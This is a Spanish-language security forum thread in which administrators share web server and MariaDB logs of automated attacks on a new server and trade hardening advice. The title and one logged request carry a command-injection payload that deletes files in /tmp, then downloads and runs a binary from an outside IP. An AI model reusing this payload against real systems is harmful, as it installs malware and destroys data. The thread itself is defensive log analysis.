elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Únete al Grupo Steam elhacker.NET


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  GET /shell?cd+/tmp;rm+-rf+*;wget+185.172.111.214/bins/UnHAnaAW.x86
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 3 Ir Abajo Respuesta Imprimir
Autor Tema: GET /shell?cd+/tmp;rm+-rf+*;wget+185.172.111.214/bins/UnHAnaAW.x86  (Leído 16,859 veces)
el-brujo
ehn
***
Desconectado Desconectado

Mensajes: 21.580


La libertad no se suplica, se conquista


Ver Perfil WWW
GET /shell?cd+/tmp;rm+-rf+*;wget+185.172.111.214/bins/UnHAnaAW.x86
« en: 19 Diciembre 2020, 12:43 pm »

Instalo un servidor web nuevo sin contenido, ni nada y a los pocos minutos ya recibo peticiones maliciosas xD

Citar
85.93.182.254 - - [14/Dec/2020:12:55:09 +0100] "GET /index.php?s=/index/ hink" 400 226 "-" "-"
68.150.109.112 - - [14/Dec/2020:12:58:24 +0100] "GET /shell?cd+/tmp;rm+-rf+*;wget+185.172.111.214/bins/UnHAnaAW.x86;chmod+777+/tmp/UnHAnaAW.x86;sh+/tmp/UnHAnaAW.x86+w00dy.jaws HTTP/1.1" 404 196 "-" "Hello, world"
200.160.123.172 - - [14/Dec/2020:12:59:19 +0100] "GET /index.php?s=/index/ hink" 400 226 "-" "-"
192.241.236.61 - - [14/Dec/2020:13:13:59 +0100] "GET / HTTP/1.1" 200 481 "-" "Mozilla/5.0 zgrab/0.x"
207.180.140.98 - - [14/Dec/2020:13:29:51 +0100] "GET /index.php?s=/index/ hink" 400 226 "-" "-"
192.241.237.198 - - [14/Dec/2020:13:34:45 +0100] "\x16\x03\x01" 400 226 "-" "-"
151.233.51.20 - - [14/Dec/2020:13:39:55 +0100] "GET /index.php?s=/index/ hink" 400 226 "-" "-"
123.115.60.33 - - [14/Dec/2020:13:55:26 +0100] "GET /index.php?s=/index/ hink" 400 226 "-" "-"
123.115.60.33 - - [14/Dec/2020:13:55:27 +0100] "GET /index.php?s=/index/ hink" 400 226 "-" "-"
192.241.238.100 - - [14/Dec/2020:13:56:04 +0100] "\x16\x03\x01" 400 226 "-" "-"
94.102.59.99 - - [14/Dec/2020:14:00:20 +0100] "GET /index.php?s=/index/ hink" 400 226 "-" "-"
222.117.123.238 - - [14/Dec/2020:14:13:16 +0100] "GET /index.php?s=/index/ hink" 400 226 "-" "-"
220.81.245.117 - - [14/Dec/2020:15:23:00 +0100] "GET /index.php?s=/index/ hink" 400 226 "-" "-"
172.69.33.42 - - [14/Dec/2020:15:57:06 +0100] "\x16\x03\x01" 400 226 "-" "-"
172.69.33.42 - - [14/Dec/2020:15:57:59 +0100] "\x16\x03\x01" 400 226 "-" "-"
108.162.215.115 - - [14/Dec/2020:15:59:00 +0100] "\x16\x03\x01" 400 226 "-" "-"
108.162.215.115 - - [14/Dec/2020:15:59:26 +0100] "\x16\x03\x01" 400 226 "-" "-"
162.158.255.59 - - [14/Dec/2020:15:59:29 +0100] "\x16\x03\x01" 400 226 "-" "-"
172.69.35.46 - - [14/Dec/2020:15:59:29 +0100] "\x16\x03\x01" 400 226 "-" "-"
162.158.255.59 - - [14/Dec/2020:16:01:35 +0100] "\x16\x03\x01" 400 226 "-" "-"
162.158.255.59 - - [14/Dec/2020:16:02:24 +0100] "\x16\x03\x01" 400 226 "-" "-"
162.158.166.112 - - [14/Dec/2020:16:03:22 +0100] "\x16\x03\x01" 400 226 "-" "-"
162.158.166.112 - - [14/Dec/2020:16:05:27 +0100] "\x16\x03\x01" 400 226 "-" "-"
172.69.135.89 - - [14/Dec/2020:16:06:05 +0100] "\x16\x03\x01" 400 226 "-" "-"
172.69.135.89 - - [14/Dec/2020:16:06:10 +0100] "\x16\x03\x01\x02" 400 226 "-" "-"
172.69.135.89 - - [14/Dec/2020:16:06:11 +0100] "\x16\x03\x01\x02" 400 226 "-" "-"
172.69.135.89 - - [14/Dec/2020:16:06:43 +0100] "\x16\x03\x01" 400 226 "-" "-"
162.158.166.52 - - [14/Dec/2020:16:07:44 +0100] "\x16\x03\x01" 400 226 "-" "-"
172.69.34.229 - - [14/Dec/2020:16:08:41 +0100] "\x16\x03\x01" 400 226 "-" "-"
165.227.4.106 - - [14/Dec/2020:16:10:34 +0100] "GET / HTTP/1.0" 200 481 "-" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
2.57.122.212 - - [14/Dec/2020:16:14:03 +0100] "GET /index.php?s=/index/ hink" 400 226 "-" "-"


Creo que será interesante publicar el  log de mod_security del servidor web para ver la cantidad inhumana de peticiones.
En línea

BloodSharp


Desconectado Desconectado

Mensajes: 803


El Messi-Vegeta :D


Ver Perfil
Re: GET /shell?cd+/tmp;rm+-rf+*;wget+185.172.111.214/bins/UnHAnaAW.x86
« Respuesta #1 en: 19 Diciembre 2020, 13:24 pm »

Instalo un servidor web nuevo sin contenido, ni nada y a los pocos minutos ya recibo peticiones maliciosas xD

Ya tan rápido te metieron una shell? Debe ser por Shodan, ZoomEye y otras escaneres alternativos...


B#
En línea



@XSStringManolo
Hacker/Programador
Colaborador
***
Desconectado Desconectado

Mensajes: 2.397


Turn off the red ligth


Ver Perfil WWW
Re: GET /shell?cd+/tmp;rm+-rf+*;wget+185.172.111.214/bins/UnHAnaAW.x86
« Respuesta #2 en: 19 Diciembre 2020, 17:12 pm »

Pasa bastante tiempo entre peticiones y cambia la ip. Es manual?
En línea

Mi perfil de patrocinadores de GitHub está activo! Puedes patrocinarme para apoyar mi trabajo de código abierto 💖

#!drvy


Desconectado Desconectado

Mensajes: 5.850



Ver Perfil WWW
Re: GET /shell?cd+/tmp;rm+-rf+*;wget+185.172.111.214/bins/UnHAnaAW.x86
« Respuesta #3 en: 19 Diciembre 2020, 17:22 pm »

Esto es más que común. Son escaners automatizados que se dedican a probar vulnerabilidades conocidas. Pasa lo mismo por SSH... nada más levantes un servidor (asignarle IP) ya tienes intentos de login.

Saludos
En línea

@XSStringManolo
Hacker/Programador
Colaborador
***
Desconectado Desconectado

Mensajes: 2.397


Turn off the red ligth


Ver Perfil WWW
Re: GET /shell?cd+/tmp;rm+-rf+*;wget+185.172.111.214/bins/UnHAnaAW.x86
« Respuesta #4 en: 19 Diciembre 2020, 17:49 pm »

Me pasaba mucho con una red en concreto, pero por lo general en servidores no me llegan peticiones por el estilo.
En línea

Mi perfil de patrocinadores de GitHub está activo! Puedes patrocinarme para apoyar mi trabajo de código abierto 💖

el-brujo
ehn
***
Desconectado Desconectado

Mensajes: 21.580


La libertad no se suplica, se conquista


Ver Perfil WWW
Re: GET /shell?cd+/tmp;rm+-rf+*;wget+185.172.111.214/bins/UnHAnaAW.x86
« Respuesta #5 en: 19 Diciembre 2020, 20:44 pm »

Esto es más que común. Son escaners automatizados que se dedican a probar vulnerabilidades conocidas. Pasa lo mismo por SSH... nada más levantes un servidor (asignarle IP) ya tienes intentos de login.

Saludos

Eso mismo creo yo, son automatizados en busca de nuevas víctimas...

Ya, el Fail2ban no para de trabajar con SSH. Los intentos fallidos de conexión por SSH son todavía más escandalosos... Me parece que llevaba 143 en pocos días.

Un día me dió por mirar las estadísticas de wp-login.php de un WordPress y la cantidad de intentos de entrar era también alarmante. Sobretodo alguna ip que hacía cada día miles de intentos xD
En línea

el-brujo
ehn
***
Desconectado Desconectado

Mensajes: 21.580


La libertad no se suplica, se conquista


Ver Perfil WWW
Re: GET /shell?cd+/tmp;rm+-rf+*;wget+185.172.111.214/bins/UnHAnaAW.x86
« Respuesta #6 en: 6 Enero 2021, 13:09 pm »

Por defecto es un error aceptar conexiones mysql externas.

Durante unas horas se me olvidó añadir el skip-networking del my.cnf de MariaDB (MySQL)

Código:
2020-12-15 11:38:41 2070 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:41 2071 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:41 2072 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:42 2073 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:42 2074 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:42 2075 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:43 2076 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:43 2077 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:44 2078 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:44 2079 [Warning] Access denied for user 'mcUser'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:45 2080 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:45 2081 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:45 2082 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:46 2083 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:46 2084 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:46 2085 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:47 2086 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:47 2087 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:48 2088 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:48 2089 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:48 2090 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:49 2091 [Warning] Access denied for user 'mcUser'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:49 2092 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:50 2093 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:50 2094 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:50 2095 [Warning] Access denied for user 'mcUser'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:51 2096 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:51 2097 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:52 2098 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:52 2099 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:52 2100 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:53 2101 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:53 2102 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:54 2103 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:54 2104 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:54 2105 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:55 2106 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:55 2107 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:56 2108 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:56 2109 [Warning] Access denied for user 'moves'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:56 2110 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:57 2111 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:57 2112 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:57 2113 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:58 2114 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:58 2115 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:59 2116 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:59 2117 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:59 2118 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:00 2119 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:00 2120 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:01 2122 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:01 2123 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:01 2124 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:02 2125 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:02 2126 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:03 2127 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:03 2128 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:03 2129 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:04 2130 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:04 2131 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:04 2132 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:05 2133 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:05 2134 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:06 2135 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:06 2136 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:06 2137 [Warning] Access denied for user 'cloudera'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:07 2138 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:07 2139 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:08 2140 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:08 2141 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: NO)
2020-12-15 11:39:08 2142 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:09 2143 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:09 2144 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:10 2145 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:10 2146 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:10 2147 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:11 2148 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:11 2149 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:11 2150 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:12 2151 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: NO)
2020-12-15 11:39:12 2152 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:13 2153 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:13 2154 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:13 2155 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:14 2156 [Warning] Access denied for user 'cloudera'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:14 2157 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:14 2158 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:15 2159 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:15 2160 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:16 2161 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:16 2162 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:16 2163 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:17 2164 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:17 2165 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:18 2166 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:18 2167 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:18 2168 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:19 2169 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:19 2170 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:19 2171 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:20 2172 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:20 2173 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:21 2174 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:21 2175 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:21 2176 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:22 2177 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:22 2178 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: NO)
2020-12-15 11:39:22 2179 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 12:42:01 2297 [Warning] Hostname 'zg-0915b-171.stretchoid.com' does not resolve to '192.241.238.9'.
2020-12-15 12:42:01 2297 [Note] Hostname 'zg-0915b-171.stretchoid.com' has the following IP addresses:
2020-12-15 12:42:01 2297 [Note]  - 91.126.217.153
2020-12-15 14:12:35 2444 [Warning] IP address '42.192.225.22' could not be resolved: Name or service not known
2020-12-15 14:12:35 2444 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:12:36 2445 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:12:37 2446 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:12:37 2447 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:12:38 2448 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:12:39 2449 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:12:43 2450 [Warning] Access denied for user 'admin'@'42.192.225.22' (using password: YES)
2020-12-15 14:12:45 2451 [Warning] Access denied for user 'admin'@'42.192.225.22' (using password: YES)
2020-12-15 14:12:45 2452 [Warning] Access denied for user 'mysql'@'42.192.225.22' (using password: YES)
2020-12-15 14:12:47 2453 [Warning] Access denied for user 'mysql'@'42.192.225.22' (using password: YES)
2020-12-15 14:12:49 2454 [Warning] Access denied for user 'admin'@'42.192.225.22' (using password: YES)
2020-12-15 14:12:52 2455 [Warning] Access denied for user 'test'@'42.192.225.22' (using password: YES)
2020-12-15 14:12:54 2456 [Warning] Access denied for user 'test'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:02 2457 [Warning] Access denied for user 'user'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:04 2459 [Warning] Access denied for user 'user'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:05 2460 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:07 2461 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:08 2462 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:11 2463 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:11 2464 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:14 2465 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:15 2466 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:16 2467 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:17 2468 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:17 2469 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:18 2470 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:19 2471 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:20 2472 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:20 2473 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:23 2474 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:23 2475 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:26 2476 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:27 2477 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:27 2478 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:28 2479 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:31 2480 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:32 2481 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:33 2482 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:34 2483 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:35 2484 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:36 2485 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:38 2486 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:38 2487 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:39 2488 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:42 2489 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:44 2490 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:45 2491 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:46 2492 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:52 2493 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:55 2494 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:57 2495 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:58 2496 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:14:00 2498 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:14:01 2499 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:14:02 2500 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:14:05 2501 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:14:05 2502 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:14:06 2503 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:14:08 2504 [Warning] Access denied for user 'user1'@'42.192.225.22' (using password: YES)
2020-12-15 14:14:10 2505 [Warning] Access denied for user 'user1'@'42.192.225.22' (using password: YES)
2020-12-15 14:14:11 2506 [Warning] Access denied for user 'test1'@'42.192.225.22' (using password: YES)
2020-12-15 14:14:12 2507 [Warning] Access denied for user 'guest'@'42.192.225.22' (using password: YES)
2020-12-15 14:14:13 2508 [Warning] Access denied for user 'guest'@'42.192.225.22' (using password: YES)
2020-12-15 14:14:14 2509 [Warning] Access denied for user 'guest'@'42.192.225.22' (using password: YES)
En línea

#!drvy


Desconectado Desconectado

Mensajes: 5.850



Ver Perfil WWW
Re: GET /shell?cd+/tmp;rm+-rf+*;wget+185.172.111.214/bins/UnHAnaAW.x86
« Respuesta #7 en: 6 Enero 2021, 13:27 pm »

Citar
Durante unas horas se me olvidó añadir el skip-networking del my.cnf de MariaDB (MySQL)

Siempre recomendable después de instalar mysql-server, ejecutar

Código
  1. mysql_secure_installation

Saludos
En línea

Danielㅤ


Desconectado Desconectado

Mensajes: 1.667


🔵🔵🔵🔵🔵🔵🔵


Ver Perfil
Re: GET /shell?cd+/tmp;rm+-rf+*;wget+185.172.111.214/bins/UnHAnaAW.x86
« Respuesta #8 en: 6 Enero 2021, 14:11 pm »

Hola, con el tema de intentos de login es como dice drvy!, asignas una IP pública y levantas un servidor y ya aparecen los intentos de login, pero a éstos habría que hacerles una trampa bastante interesante e ingeniosa, algo que sirve perfectamente para intentos de login o brute force.

Cuál es el objetivo de la fuerza bruta a un sistema? o que es lo que quieren hacer cuando intentan loguearse con algún nombre de usuario del servidor? Es justamente obtener el acceso correcto para ingresar, pero, después de ingresar que es lo que pasa con esos intentos?, simplemente dejan de seguir, dejan de insistir porque obviamente ya consiguieron el acceso.

Lo que se podría hacer es darle ok a todo, cuando un sistema detecta esos intentos, lo que hace es aceptar los login como si fuesen correctos, les hace una trampa y cuando el atacante cree que ya tiene el acceso, simplemente es falso, no lo tiene, pero su sistema automatizado (el del atacante) no sirve para nada, porque todo lo que intente es correcto aunque obviamente son logins falso y no le va a dar acceso de nada, pero de esta forma el atacante queda confundido y se va a dar cuenta de esa medida de seguridad, y que terminara haciendo? abandonando el sitio... lo mismo si es algo automatizado, al aceptar cualquier login ese bot/script se detendrá y los intentos también.

Es un método posiblemente más seguro cuando otros sistemas rechazan todo el tiempo esos miles de login, pero de ésta forma los acepta y los hace creer que tienen acceso cuando en realidad no lo tienen y así no pueden saber cuál es el login correcto, es como los scanners de puertos que pueden hacer creer (que aparezcan abiertos) a los atacantes o sistemas automatizados que x puertos están abiertos cuando verdaderamente están cerrados.


Saludos
« Última modificación: 6 Enero 2021, 14:34 pm por [D]aniel » En línea

el-brujo
ehn
***
Desconectado Desconectado

Mensajes: 21.580


La libertad no se suplica, se conquista


Ver Perfil WWW
Re: GET /shell?cd+/tmp;rm+-rf+*;wget+185.172.111.214/bins/UnHAnaAW.x86
« Respuesta #9 en: 6 Enero 2021, 14:22 pm »

Tienes razón #!drvy  olvidé ejecutar el "secure installation" porque copié parte de la config del servidor migrado.

https://mariadb.com/kb/en/mysql_secure_installation/

No tengo ni la base de datos test, ni user anónimo.

Añadí otras opciones básicas de seguridad en el fichero my.cnf

Código:
#security
local-infile=0
# para poner mysql remoto comentar
skip-networking
#no dns lookups
skip-name-resolve

Citar
Cuál es el objetivo de la fuerza bruta a un sistema? o que es lo que quieren hacer cuando intentan loguearse con algún nombre de usuario del servidor?

Son ataques automáticos y automatizados seguro. Si usas credenciales débiles o por defecto pues ale, entras a formar parte de una botnet o algo peor.
En línea

Páginas: [1] 2 3 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
WGET
GNU/Linux
Pirat3net 1 2,497 Último mensaje 22 Febrero 2012, 15:44 pm
por WHK
[PHP Shell] Poison Shell 1.0 (Version Identada)
Nivel Web
BigBear 3 6,819 Último mensaje 15 Octubre 2012, 07:52 am
por ameise_1987
duda con wget
GNU/Linux
WHK 3 3,288 Último mensaje 11 Enero 2013, 20:36 pm
por WHK
Que opinan de la moda de los bins ?
Dudas Generales
bonjoviivan 1 3,837 Último mensaje 26 Marzo 2015, 07:49 am
por engel lex
Wget
Hacking
makarov 0 2,253 Último mensaje 9 Octubre 2016, 15:14 pm
por makarov
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines